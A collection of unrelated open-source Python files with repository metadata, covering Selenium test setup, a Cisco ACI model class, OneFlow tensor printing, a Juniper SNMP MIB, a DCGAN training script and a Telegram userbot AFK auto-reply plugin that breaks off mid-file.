b4838aea4ebb660fe5f294da900b8d93a5ba1f09 | 2a671de9ff13e2d82de0abbffa1712000a5c53e6 | /selenium/Website/testcase/model/testutil.py | f1f3b0daca07106b384c17d22f00e0307a46e3fb | [] | no_license | asdf27901/auto_selenium | eddb28ed60cb8238bc5f742f66ddd972e0a518d0 | f669a222e102c1737966d8863e4a74650403e379 | refs/heads/main | 2023-03-27T01:08:07.695555 | 2021-03-14T18:31:40 | 2021-03-14T18:31:40 | 347,719,423 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | import unittest
from driver.driver import *
from Website.config.data_config import *
class SetStartAndEnd(unittest.TestCase):
def setUp(self) -> None:
self.driver = get_driver()
self.driver.maximize_window()
self.driver.implicitly_wait(timeout)
def tearDown(self) -> None:
self.driver.quit()
| [
"[email protected]"
] | |
c885620223bab7b3b759d52fbf738145d6690444 | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/rtctrl/setrtmetricdef.py | f5d55b1458f3e0a5d0f447271471db818060c777 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class SetRtMetricDef(Mo):
"""
The set route metric definition.
"""
meta = ClassMeta("cobra.model.rtctrl.SetRtMetricDef")
meta.moClassName = "rtctrlSetRtMetricDef"
meta.rnFormat = "smetric"
meta.category = MoCategory.REGULAR
meta.label = "None"
meta.writeAccessMask = 0x1000001
meta.readAccessMask = 0x1000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.rtctrl.AttrDef")
meta.superClasses.add("cobra.model.pol.Comp")
meta.superClasses.add("cobra.model.rtctrl.ASetRule")
meta.superClasses.add("cobra.model.fabric.L3ProtoComp")
meta.superClasses.add("cobra.model.fabric.ProtoComp")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.rtctrl.ASetRtMetric")
meta.rnPrefixes = [
('smetric', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "metric", "metric", 795, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(1, 4294967295)]
meta.props.add("metric", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "type", "type", 794, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 5
prop.defaultValueStr = "metric"
prop._addConstant("as-path", "as-path", 11)
prop._addConstant("community", "community", 1)
prop._addConstant("dampening-pol", "dampening-type", 10)
prop._addConstant("ip-nh", "ip-nexthop", 8)
prop._addConstant("local-pref", "local-preference", 4)
prop._addConstant("metric", "metric", 5)
prop._addConstant("metric-type", "metric-type", 9)
prop._addConstant("ospf-fwd-addr", "ospf-fowarding-address", 7)
prop._addConstant("ospf-nssa", "ospf-nssa-area", 6)
prop._addConstant("rt-tag", "route-tag", 2)
prop._addConstant("rt-weight", "route-weight", 3)
meta.props.add("type", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
d4b8f5989466780e1f4819d54a8447935d821ed3 | b368f0dd09a4eed97a350ca01ac170bb44347f8d | /python/oneflow/framework/tensor_str.py | 10ecfbbc8c30e7196b4c34f79684cca7d94e273f | [
"Apache-2.0"
] | permissive | opencici2006/oneflow | bb67d3475e5b85d88f7f627733af75859e431759 | 7c3b42fa5ae95823d195c077565f0c190d98e7ad | refs/heads/master | 2023-08-01T14:22:33.745620 | 2021-09-09T02:52:54 | 2021-09-09T02:52:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,715 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
This file is mostly referenced from PyTorch v1.8.1 torch/_tensor_str.py
"""
import numpy as np
import math
from typing import Optional
import oneflow as flow
class __PrinterOptions(object):
precision: int = 4
threshold: float = 1000
edgeitems: int = 3
linewidth: int = 80
sci_mode: Optional[bool] = None
PRINT_OPTS = __PrinterOptions()
def _try_convert_to_local_tensor(tensor):
if tensor.is_consistent:
tensor = tensor.to_consistent(
placement=tensor.placement, sbp=flow.sbp.broadcast
).to_local()
return tensor
class _Formatter(object):
def __init__(self, tensor):
self.floating_dtype = tensor.dtype.is_floating_point
self.int_mode = True
self.sci_mode = False
self.max_width = 1
self.random_sample_num = 50
tensor = _try_convert_to_local_tensor(tensor)
with flow.no_grad():
tensor_view = tensor.reshape(-1)
if not self.floating_dtype:
for value in tensor_view:
value_str = "{}".format(value)
self.max_width = max(self.max_width, len(value_str))
else:
nonzero_finite_vals = flow.masked_select(tensor_view, tensor_view.ne(0))
if nonzero_finite_vals.numel() == 0:
# no valid number, do nothing
return
nonzero_finite_abs = nonzero_finite_vals.abs()
nonzero_finite_min = nonzero_finite_abs.min().numpy().astype(np.float64)
nonzero_finite_max = nonzero_finite_abs.max().numpy().astype(np.float64)
for value in nonzero_finite_abs.numpy():
if value != np.ceil(value):
self.int_mode = False
break
if self.int_mode:
# Check if scientific representation should be used.
if (
nonzero_finite_max / nonzero_finite_min > 1000.0
or nonzero_finite_max > 1.0e8
):
self.sci_mode = True
for value in nonzero_finite_vals:
value_str = (
("{{:.{}e}}").format(PRINT_OPTS.precision).format(value)
)
self.max_width = max(self.max_width, len(value_str))
else:
for value in nonzero_finite_vals:
value_str = ("{:.0f}").format(value)
self.max_width = max(self.max_width, len(value_str) + 1)
else:
if (
nonzero_finite_max / nonzero_finite_min > 1000.0
or nonzero_finite_max > 1.0e8
or nonzero_finite_min < 1.0e-4
):
self.sci_mode = True
for value in nonzero_finite_vals:
value_str = (
("{{:.{}e}}").format(PRINT_OPTS.precision).format(value)
)
self.max_width = max(self.max_width, len(value_str))
else:
for value in nonzero_finite_vals:
value_str = (
("{{:.{}f}}").format(PRINT_OPTS.precision).format(value)
)
self.max_width = max(self.max_width, len(value_str))
if PRINT_OPTS.sci_mode is not None:
self.sci_mode = PRINT_OPTS.sci_mode
def width(self):
return self.max_width
def format(self, value):
if self.floating_dtype:
if self.sci_mode:
ret = (
("{{:{}.{}e}}")
.format(self.max_width, PRINT_OPTS.precision)
.format(value)
)
elif self.int_mode:
ret = "{:.0f}".format(value)
if not (math.isinf(value) or math.isnan(value)):
ret += "."
else:
ret = ("{{:.{}f}}").format(PRINT_OPTS.precision).format(value)
else:
ret = "{}".format(value)
return (self.max_width - len(ret)) * " " + ret
def _scalar_str(self, formatter1):
return formatter1.format(_try_convert_to_local_tensor(self).tolist())
def _vector_str(self, indent, summarize, formatter1):
# length includes spaces and comma between elements
element_length = formatter1.width() + 2
elements_per_line = max(
1, int(math.floor((PRINT_OPTS.linewidth - indent) / (element_length)))
)
char_per_line = element_length * elements_per_line
def _val_formatter(val, formatter1=formatter1):
return formatter1.format(val)
if summarize and self.size(0) > 2 * PRINT_OPTS.edgeitems:
left_values = _try_convert_to_local_tensor(
self[: PRINT_OPTS.edgeitems]
).tolist()
right_values = _try_convert_to_local_tensor(
self[-PRINT_OPTS.edgeitems :]
).tolist()
data = (
[_val_formatter(val) for val in left_values]
+ [" ..."]
+ [_val_formatter(val) for val in right_values]
)
else:
values = _try_convert_to_local_tensor(self).tolist()
data = [_val_formatter(val) for val in values]
data_lines = [
data[i : i + elements_per_line] for i in range(0, len(data), elements_per_line)
]
lines = [", ".join(line) for line in data_lines]
return "[" + ("," + "\n" + " " * (indent + 1)).join(lines) + "]"
def _tensor_str_with_formatter(self, indent, summarize, formatter1):
dim = self.dim()
if dim == 0:
return _scalar_str(self, formatter1)
if dim == 1:
return _vector_str(self, indent, summarize, formatter1)
if summarize and self.size(0) > 2 * PRINT_OPTS.edgeitems:
slices = (
[
_tensor_str_with_formatter(self[i], indent + 1, summarize, formatter1)
for i in range(0, PRINT_OPTS.edgeitems)
]
+ ["..."]
+ [
_tensor_str_with_formatter(self[i], indent + 1, summarize, formatter1)
for i in range(self.shape[0] - PRINT_OPTS.edgeitems, self.shape[0])
]
)
else:
slices = [
_tensor_str_with_formatter(self[i], indent + 1, summarize, formatter1)
for i in range(0, self.size(0))
]
tensor_str = ("," + "\n" * (dim - 1) + " " * (indent + 1)).join(slices)
return "[" + tensor_str + "]"
def _tensor_str(self, indent):
summarize = self.numel() > PRINT_OPTS.threshold
if self.dtype is flow.float16:
self = self.float()
# TODO: only flow.sbp.split(0) is supported here, not flow.sbp.split(x) for other axes.
def _cannot_print(sbp):
return (
sbp != flow.sbp.partial_sum
and sbp != flow.sbp.broadcast
and sbp != flow.sbp.split(0)
)
# TODO: delete it when boxing on "CPU" and s1->b on "GPU" are ready
if self.is_consistent:
self = self.to("cuda")
if all(_cannot_print(sbp) for sbp in self.sbp):
return "[...]"
with flow.no_grad():
formatter = _Formatter(get_summarized_data(self) if summarize else self)
return _tensor_str_with_formatter(self, indent, summarize, formatter)
def _add_suffixes(tensor_str, suffixes, indent):
tensor_strs = [tensor_str]
last_line_len = len(tensor_str) - tensor_str.rfind("\n") + 1
for suffix in suffixes:
suffix_len = len(suffix)
if last_line_len + suffix_len + 2 > PRINT_OPTS.linewidth:
tensor_strs.append(",\n" + " " * indent + suffix)
last_line_len = indent + suffix_len
else:
tensor_strs.append(", " + suffix)
last_line_len += suffix_len + 2
tensor_strs.append(")")
return "".join(tensor_strs)
def get_summarized_data(self):
dim = self.dim()
if dim == 0:
return self
if dim == 1:
if self.size(0) > 2 * PRINT_OPTS.edgeitems:
return flow.cat(
(self[: PRINT_OPTS.edgeitems], self[-PRINT_OPTS.edgeitems :])
)
else:
return self
if self.size(0) > 2 * PRINT_OPTS.edgeitems:
start = [self[i] for i in range(0, PRINT_OPTS.edgeitems)]
end = [
self[i] for i in range(self.shape[0] - PRINT_OPTS.edgeitems, self.shape[0])
]
return flow.stack([get_summarized_data(x) for x in (start + end)])
else:
return flow.stack([get_summarized_data(x) for x in self])
def _gen_tensor_str_template(tensor, is_meta):
is_meta = is_meta or tensor.is_lazy
prefix = "tensor("
indent = len(prefix)
suffixes = []
# tensor is local or consistent
if tensor.is_consistent:
suffixes.append(f"placement={str(tensor.placement)}")
suffixes.append(f"sbp={str(tensor.sbp)}")
elif tensor.device.type == "cuda" or tensor.device.type == "gpu":
suffixes.append("device='" + str(tensor.device) + "'")
elif tensor.device.type != "cpu":
raise RuntimeError("unknown device type")
if tensor.is_lazy:
suffixes.append("is_lazy='True'")
# tensor is empty, meta or normal
if tensor.numel() == 0:
# Explicitly print the shape if it is not (0,), to match NumPy behavior
if tensor.dim() != 1:
suffixes.append("size=" + str(tuple(tensor.shape)))
tensor_str = "[]"
elif is_meta:
tensor_str = "..."
suffixes.append("size=" + str(tuple(tensor.shape)))
else:
tensor_str = _tensor_str(tensor, indent)
suffixes.append("dtype=" + str(tensor.dtype))
if tensor.grad_fn is not None:
name = tensor.grad_fn.name()
suffixes.append("grad_fn=<{}>".format(name))
elif tensor.requires_grad:
suffixes.append("requires_grad=True")
return _add_suffixes(prefix + tensor_str, suffixes, indent)
def _gen_tensor_str(tensor):
return _gen_tensor_str_template(tensor, False)
def _gen_tensor_meta_str(tensor):
# meta
return _gen_tensor_str_template(tensor, True)
| [
"[email protected]"
] | |
0ffe61f0c5fc6dd5c9c0e340692739b892566dc0 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/Juniper-TSM-CONF.py | 71fad16c3643ce9206c5564ee369544ce182b392 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 3,237 | py | #
# PySNMP MIB module Juniper-TSM-CONF (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Juniper-TSM-CONF
# Produced by pysmi-0.3.4 at Wed May 1 14:04:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion")
juniAgents, = mibBuilder.importSymbols("Juniper-Agents", "juniAgents")
AgentCapabilities, NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "AgentCapabilities", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, MibIdentifier, TimeTicks, NotificationType, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter32, Integer32, Gauge32, Unsigned32, Counter64, Bits, iso = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "MibIdentifier", "TimeTicks", "NotificationType", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter32", "Integer32", "Gauge32", "Unsigned32", "Counter64", "Bits", "iso")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
juniTsmAgent = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 5, 2, 67))
juniTsmAgent.setRevisions(('2003-10-27 22:50',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: juniTsmAgent.setRevisionsDescriptions(('The initial release of this management information module.',))
if mibBuilder.loadTexts: juniTsmAgent.setLastUpdated('200310272250Z')
if mibBuilder.loadTexts: juniTsmAgent.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: juniTsmAgent.setContactInfo(' Juniper Networks, Inc. Postal: 10 Technology Park Drive Westford, MA 01886-3146 USA Tel: +1 978 589 5800 E-mail: [email protected]')
if mibBuilder.loadTexts: juniTsmAgent.setDescription('The agent capabilities definitions for the Terminal Server Management (TSM) component of the SNMP agent in the Juniper E-series family of products.')
juniTsmAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 67, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniTsmAgentV1 = juniTsmAgentV1.setProductRelease('Version 1 of the Terminal Server Management (TSM) component of the\n JUNOSe SNMP agent. This version of the TSM component is supported in\n JUNOSe 5.3 and subsequent system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniTsmAgentV1 = juniTsmAgentV1.setStatus('current')
if mibBuilder.loadTexts: juniTsmAgentV1.setDescription('The MIB supported by the JUNOSe SNMP agent for the TSM application.')
mibBuilder.exportSymbols("Juniper-TSM-CONF", PYSNMP_MODULE_ID=juniTsmAgent, juniTsmAgent=juniTsmAgent, juniTsmAgentV1=juniTsmAgentV1)
| [
"[email protected]"
] | |
501ce999fd6452c28544240627deb50e62312876 | fce83f1b55b8894afab9eb58ae8b4ba2e26eb86b | /examples/GAN/DCGAN.py | e9df6b36319476aea07fd240e26005c998a75385 | [
"Apache-2.0"
] | permissive | PeisenZhao/tensorpack | b65d451f6d4a7fe1af1e183bdc921c912f087586 | 6ca57de47e4a76b57c8aa2f0dad87c1059c13ac0 | refs/heads/master | 2021-05-05T01:46:05.209522 | 2018-01-31T05:29:37 | 2018-01-31T05:29:37 | 119,641,372 | 1 | 0 | null | 2018-01-31T05:52:07 | 2018-01-31T05:52:06 | null | UTF-8 | Python | false | false | 5,554 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: DCGAN.py
# Author: Yuxin Wu <[email protected]>
import glob
import numpy as np
import os
import argparse
from tensorpack import *
from tensorpack.utils.viz import stack_patches
from tensorpack.tfutils.scope_utils import auto_reuse_variable_scope
from tensorpack.utils.globvars import globalns as opt
import tensorflow as tf
from GAN import GANTrainer, RandomZData, GANModelDesc
"""
1. Download the 'aligned&cropped' version of CelebA dataset
from http://mmlab.ie.cuhk.edu.hk/projects/CelebA.html
2. Start training:
./DCGAN-CelebA.py --data /path/to/img_align_celeba/ --crop-size 140
Generated samples will be available through tensorboard
3. Visualize samples with an existing model:
./DCGAN-CelebA.py --load path/to/model --sample
You can also train on other images (just use any directory of jpg files in
`--data`). But you may need to change the preprocessing.
A pretrained model on CelebA is at http://models.tensorpack.com/GAN/
"""
# global vars
opt.SHAPE = 64
opt.BATCH = 128
opt.Z_DIM = 100
class Model(GANModelDesc):
def _get_inputs(self):
return [InputDesc(tf.float32, (None, opt.SHAPE, opt.SHAPE, 3), 'input')]
def generator(self, z):
""" return an image generated from z"""
nf = 64
l = FullyConnected('fc0', z, nf * 8 * 4 * 4, nl=tf.identity)
l = tf.reshape(l, [-1, 4, 4, nf * 8])
l = BNReLU(l)
with argscope(Deconv2D, nl=BNReLU, kernel_shape=4, stride=2):
l = Deconv2D('deconv1', l, nf * 4)
l = Deconv2D('deconv2', l, nf * 2)
l = Deconv2D('deconv3', l, nf)
l = Deconv2D('deconv4', l, 3, nl=tf.identity)
l = tf.tanh(l, name='gen')
return l
@auto_reuse_variable_scope
def discriminator(self, imgs):
""" return a (b, 1) logits"""
nf = 64
with argscope(Conv2D, nl=tf.identity, kernel_shape=4, stride=2):
l = (LinearWrap(imgs)
.Conv2D('conv0', nf, nl=tf.nn.leaky_relu)
.Conv2D('conv1', nf * 2)
.BatchNorm('bn1')
.tf.nn.leaky_relu()
.Conv2D('conv2', nf * 4)
.BatchNorm('bn2')
.tf.nn.leaky_relu()
.Conv2D('conv3', nf * 8)
.BatchNorm('bn3')
.tf.nn.leaky_relu()
.FullyConnected('fct', 1, nl=tf.identity)())
return l
def _build_graph(self, inputs):
image_pos = inputs[0]
image_pos = image_pos / 128.0 - 1
z = tf.random_uniform([opt.BATCH, opt.Z_DIM], -1, 1, name='z_train')
z = tf.placeholder_with_default(z, [None, opt.Z_DIM], name='z')
with argscope([Conv2D, Deconv2D, FullyConnected],
W_init=tf.truncated_normal_initializer(stddev=0.02)):
with tf.variable_scope('gen'):
image_gen = self.generator(z)
tf.summary.image('generated-samples', image_gen, max_outputs=30)
with tf.variable_scope('discrim'):
vecpos = self.discriminator(image_pos)
vecneg = self.discriminator(image_gen)
self.build_losses(vecpos, vecneg)
self.collect_variables()
def _get_optimizer(self):
lr = tf.get_variable('learning_rate', initializer=2e-4, trainable=False)
return tf.train.AdamOptimizer(lr, beta1=0.5, epsilon=1e-3)
def get_augmentors():
augs = []
if opt.load_size:
augs.append(imgaug.Resize(opt.load_size))
if opt.crop_size:
augs.append(imgaug.CenterCrop(opt.crop_size))
augs.append(imgaug.Resize(opt.SHAPE))
return augs
def get_data(datadir):
imgs = glob.glob(datadir + '/*.jpg')
ds = ImageFromFile(imgs, channel=3, shuffle=True)
ds = AugmentImageComponent(ds, get_augmentors())
ds = BatchData(ds, opt.BATCH)
ds = PrefetchDataZMQ(ds, 5)
return ds
def sample(model, model_path, output_name='gen/gen'):
pred = PredictConfig(
session_init=get_model_loader(model_path),
model=model,
input_names=['z'],
output_names=[output_name, 'z'])
pred = SimpleDatasetPredictor(pred, RandomZData((100, opt.Z_DIM)))
for o in pred.get_result():
o = o[0] + 1
o = o * 128.0
o = np.clip(o, 0, 255)
o = o[:, :, :, ::-1]
stack_patches(o, nr_row=10, nr_col=10, viz=True)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
parser.add_argument('--sample', action='store_true', help='view generated examples')
parser.add_argument('--data', help='a jpeg directory')
parser.add_argument('--load-size', help='size to load the original images', type=int)
parser.add_argument('--crop-size', help='crop the original images', type=int)
args = parser.parse_args()
opt.use_argument(args)
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
return args
if __name__ == '__main__':
args = get_args()
if args.sample:
sample(Model(), args.load)
else:
assert args.data
logger.auto_set_dir()
GANTrainer(
input=QueueInput(get_data(args.data)),
model=Model()).train_with_defaults(
callbacks=[ModelSaver()],
steps_per_epoch=300,
max_epoch=200,
session_init=SaverRestore(args.load) if args.load else None
)
| [
"[email protected]"
] | |
483db4217063a3ca57b15543b683ac4c80e5c4ee | d47ed9550468b360a54a4fe8e3cfe63bf15c1ddb | /ProgrammingPython/Preview/initdata.py | c53957abef9ca1ef665ef5ac0b238760cdf7d094 | [] | no_license | yuzuqiang/learnPython | 880bb1e5d40a7a4d928068ae892e9b85f84ec355 | 490c8ccf3a61b967641ec47e2f549574fe9a2fa0 | refs/heads/master | 2021-01-13T03:47:36.611964 | 2017-01-01T18:24:23 | 2017-01-01T18:24:23 | 77,197,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | #Record
bob = {'name': 'Bob Smith', 'age': 42, 'pay': 30000, 'job': 'dev'}
sue = {'name': 'Sue Jones', 'age': 45, 'pay': 40000, 'job': 'hdw'}
tom = {'name': 'Tom', 'age': 50, 'pay': 0, 'job': None}
#Database
db = {}
db['bob'] = bob
db['sue'] = sue
db['tom'] = tom
#As shell run
if __name__=='__main__':
for key in db:
print(key, '=>\n', db[key])
| [
"[email protected]"
] | |
35889e57cfde9a2d0c586a094664618e9a1813af | 1b23f77f8a615ff563e9b9b6ad0da93dfa3ad8d6 | /afk.py | 8cfe0868c82112813d7cbdacfa94a16983708b6a | [
"MIT"
] | permissive | Dark-PRINCESS/Dark-PRINCESS- | 14a8d7fc81374bfbdc37241c72f7b87d97f32ad5 | 0ad9c67960c8f88745442d264fdcd113b9925807 | refs/heads/main | 2023-01-24T09:16:27.018838 | 2020-11-14T10:52:00 | 2020-11-14T10:52:00 | 306,575,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,483 | py | """AFK Plugin for Friday
Syntax: .afk REASON"""
import asyncio
import datetime
from telethon import events
from telethon.tl import functions, types
from userbot.utils import admin_cmd
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
USER_AFK = {}
afk_time = None
last_afk_message = {}
@borg.on(events.NewMessage(outgoing=True)) # pylint:disable=E0602
async def set_not_afk(event):
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
current_message = event.message.message
if ".afk" not in current_message and "yes" in USER_AFK: # pylint:disable=E0602
try:
await borg.send_message( # pylint:disable=E0602
Config.PLUGIN_CHANNEL, # pylint:disable=E0602
"#AfkLogger My Boss Went Afk"
)
except Exception as e: # pylint:disable=C0103,W0703
await borg.send_message( # pylint:disable=E0602
event.chat_id,
"Please set `PLUGIN_CHANNEL` " + \
"for the proper functioning of afk functionality " + \
"in @FridayOT\n\n `{}`".format(str(e)),
reply_to=event.message.id,
silent=True
)
USER_AFK = {} # pylint:disable=E0602
afk_time = None # pylint:disable=E0602
@borg.on(admin_cmd(pattern=r"afk ?(.*)"))
async def _(event):
if event.fwd_from:
return
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
global reason
USER_AFK = {}
afk_time = None
last_afk_message = {}
reason = event.pattern_match.group(1)
if not USER_AFK: # pylint:disable=E0602
last_seen_status = await borg( # pylint:disable=E0602
functions.account.GetPrivacyRequest(
types.InputPrivacyKeyStatusTimestamp()
)
)
if isinstance(last_seen_status.rules, types.PrivacyValueAllowAll):
afk_time = datetime.datetime.now() # pylint:disable=E0602
USER_AFK = f"yes: {reason}" # pylint:disable=E0602
if reason:
await event.edit(f"My Mistress Is Going Afk ! And The Reason is {reason}")
else:
await event.edit(f"My Boss is Going")
await asyncio.sleep(5)
await event.delete()
try:
await borg.send_message( # pylint:disable=E0602
Config.PLUGIN_CHANNEL, # pylint:disable=E0602
f"#AfkLogger Reason : {reason}"
)
except Exception as e: # pylint:disable=C0103,W0703
logger.warn(str(e)) # pylint:disable=E0602
@borg.on(events.NewMessage( # pylint:disable=E0602
incoming=True,
func=lambda e: bool(e.mentioned or e.is_private)
))
async def on_afk(event):
if event.fwd_from:
return
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
afk_since = "`a while ago`"
current_message_text = event.message.message.lower()
if "afk" in current_message_text:
# userbot's should not reply to other userbot's
# https://core.telegram.org/bots/faq#why-doesn-39t-my-bot-see-messages-from-other-bots
return False
if USER_AFK and not (await event.get_sender()).bot: # pylint:disable=E0602
if afk_time: # pylint:disable=E0602
now = datetime.datetime.now()
datime_since_afk = now - afk_time # pylint:disable=E0602
time = float(datime_since_afk.seconds)
days = time // (24 * 3600)
time = time % (24 * 3600)
hours = time // 3600
time %= 3600
minutes = time // 60
time %= 60
seconds = time
if days == 1:
afk_since = "**Yesterday**"
elif days > 1:
if days > 6:
date = now + \
datetime.timedelta(
days=-days, hours=-hours, minutes=-minutes)
afk_since = date.strftime("%A, %Y %B %m, %H:%I")
else:
wday = now + datetime.timedelta(days=-days)
afk_since = wday.strftime('%A')
elif hours > 1:
afk_since = f"`{int(hours)}h{int(minutes)}m` **ago**"
elif minutes > 0:
afk_since = f"`{int(minutes)}m{int(seconds)}s` **ago**"
else:
afk_since = f"`{int(seconds)}s` **ago**"
msg = None
message_to_reply = f"**My Boss is AFK** ! \n\n**Reason** : `{reason}` \n\n**Afk Since** : {afk_since}" + \
